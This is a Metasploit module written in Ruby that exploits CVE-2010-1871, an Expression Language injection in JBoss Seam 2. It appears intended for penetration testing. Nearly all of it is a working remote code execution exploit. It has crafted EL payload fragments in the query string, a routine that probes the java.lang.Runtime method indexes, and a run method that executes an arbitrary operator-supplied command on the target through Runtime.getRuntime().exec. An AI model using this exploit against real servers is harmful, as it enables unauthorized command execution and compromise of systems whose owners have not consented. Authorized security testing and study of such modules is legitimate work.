##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
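class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Query-string fragments of the EL injection (CVE-2010-1871). Seam evaluates
  # the expression handed to actionOutcome; the result ends up in the Location
  # header of the redirect the server answers with, which is where the matchers
  # below look. "%23" is the url-encoded "#" that opens the EL expression, so
  # these Ruby strings contain no interpolation.
  PROBE_PREFIX = "?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[".freeze
  EXEC_MIDDLE = "].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[".freeze
  EXEC_SUFFIX = "].invoke(null),'".freeze

  # Signatures reflected by a probe when the slot holds Runtime.exec(String)
  # or Runtime.getRuntime(), and the Process#toString() a successful exec()
  # reflects. Java 8 and earlier name the Unix process class UNIXProcess;
  # Windows JVMs and Java 9+ use ProcessImpl, so both are accepted.
  EXEC_METHOD_RE = /java\.lang\.Runtime\.exec%28java\.lang\.String%29/
  GET_RUNTIME_METHOD_RE = /java\.lang\.Runtime\+java\.lang\.Runtime\.getRuntime/
  PROCESS_RE = /pwned=java\.lang\.(UNIXProcess|ProcessImpl)/

  # Per-request timeout in seconds passed to send_request_cgi.
  REQUEST_TIMEOUT = 20

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'JBoss Seam 2 Remote Command Execution',
        'Description' => %q{
          JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform
          4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression
          Language (EL) expressions, which allows remote attackers to execute arbitrary code
          via a crafted URL. This modules also has been tested successfully against IBM
          WebSphere 6.1 running on iSeries.

          NOTE: this is only a vulnerability when the Java Security Manager is not properly
          configured.
        },
        'Author' => [
          'guerrino di massa', # Metasploit module
          'Cristiano Maruti <cmaruti[at]gmail.com>' # Support for IBM Websphere 6.1
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2010-1871'],
          ['OSVDB', '66881']
        ],
        'DisclosureDate' => '2010-07-19',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [ true, 'Target URI', '/seam-booking/home.seam']),
        OptString.new('CMD', [ true, 'The command to execute.'])
      ]
    )

    register_advanced_options(
      [
        # getDeclaredMethods() ordering is JVM-specific, so the two slots the
        # payload needs are located by probing indexes 0 .. METHOD_SLOTS-1.
        OptInt.new('METHOD_SLOTS', [ true, 'Number of java.lang.Runtime method slots to probe', 25])
      ]
    )
  end

  # Locate the Runtime.exec(String) and Runtime.getRuntime() slots.
  #
  # This is an active check: every probe is itself an EL injection (it calls
  # getDeclaredMethods() but never exec()) and will appear in the target's
  # access logs.
  #
  # @return [Exploit::CheckCode] Vulnerable when both slots were reflected,
  #   Unknown otherwise (no response, no redirect, or a Security Manager in
  #   the way cannot be told apart from here).
  def check
    exec_index, runtime_index = find_method_indexes
    return Exploit::CheckCode::Vulnerable if exec_index && runtime_index

    Exploit::CheckCode::Unknown
  end

  # Probe for the method indexes, then run CMD through
  # Runtime.getRuntime().exec(String).
  #
  # Execution is blind: the only feedback is the Process object reflected into
  # the Location header, so command output is never returned to the operator.
  def run
    exec_index, runtime_index = find_method_indexes
    unless exec_index && runtime_index
      print_error('Target appears not vulnerable!')
      return
    end

    cmd = datastore['CMD']
    print_status('Target appears VULNERABLE!')
    print_status('Sending remote command:' + cmd)

    res = send_request_cgi(
      {
        'uri' => exec_uri(exec_index, runtime_index, cmd),
        'method' => 'GET'
      }, REQUEST_TIMEOUT
    )

    if res && res.headers['Location'].to_s.match?(PROCESS_RE)
      print_good('Exploited successfully')
    else
      print_error('Exploit failed')
    end
  end

  private

  # Normalised TARGETURI that every request is built on.
  def base_uri
    normalize_uri(target_uri.to_s)
  end

  # Request that reflects the signature of getDeclaredMethods()[index].
  #
  # @param index [Integer] method slot to inspect
  # @return [String] request URI including the query string
  def probe_uri(index)
    "#{base_uri}#{PROBE_PREFIX}#{index}]}"
  end

  # Request that invokes getDeclaredMethods()[exec_index] on the Runtime
  # returned by getDeclaredMethods()[runtime_index].
  #
  # CMD is URL-encoded and dropped inside a single-quoted EL string literal;
  # a single quote in CMD terminates that literal and breaks the expression,
  # and nothing here escapes it. Runtime.exec(String) tokenises the command on
  # whitespace and runs it without a shell, so shell syntax (pipes, redirects)
  # is only honoured if CMD itself invokes a shell.
  #
  # @param exec_index [Integer] slot holding Runtime.exec(String)
  # @param runtime_index [Integer] slot holding Runtime.getRuntime()
  # @param cmd [String] raw command from the CMD option
  # @return [String] request URI including the query string
  def exec_uri(exec_index, runtime_index, cmd)
    base_uri + PROBE_PREFIX + exec_index.to_s +
      EXEC_MIDDLE + runtime_index.to_s +
      EXEC_SUFFIX + Rex::Text.uri_encode(cmd) + "')}"
  end

  # Walk the first METHOD_SLOTS entries of Runtime.getDeclaredMethods() and
  # report which slot reflects exec(String) and which reflects getRuntime().
  #
  # Probing stops as soon as both are found so the target is not hit (and
  # logged on) more than necessary.
  #
  # @return [Array(Integer, Integer)] [exec_index, runtime_index]; either entry
  #   is nil when the matching signature was not seen
  def find_method_indexes
    exec_index = nil
    runtime_index = nil

    datastore['METHOD_SLOTS'].times do |index|
      res = send_request_cgi(
        {
          'uri' => probe_uri(index),
          'method' => 'GET'
        }, REQUEST_TIMEOUT
      )
      location = res ? res.headers['Location'].to_s : ''

      if location.match?(EXEC_METHOD_RE)
        exec_index = index
        print_status("Found right index at [#{index}] - exec")
      elsif location.match?(GET_RUNTIME_METHOD_RE)
        runtime_index = index
        print_status("Found right index at [#{index}] - getRuntime")
      else
        print_status("Index [#{index}]")
      end

      break if exec_index && runtime_index
    end

    [exec_index, runtime_index]
  end
end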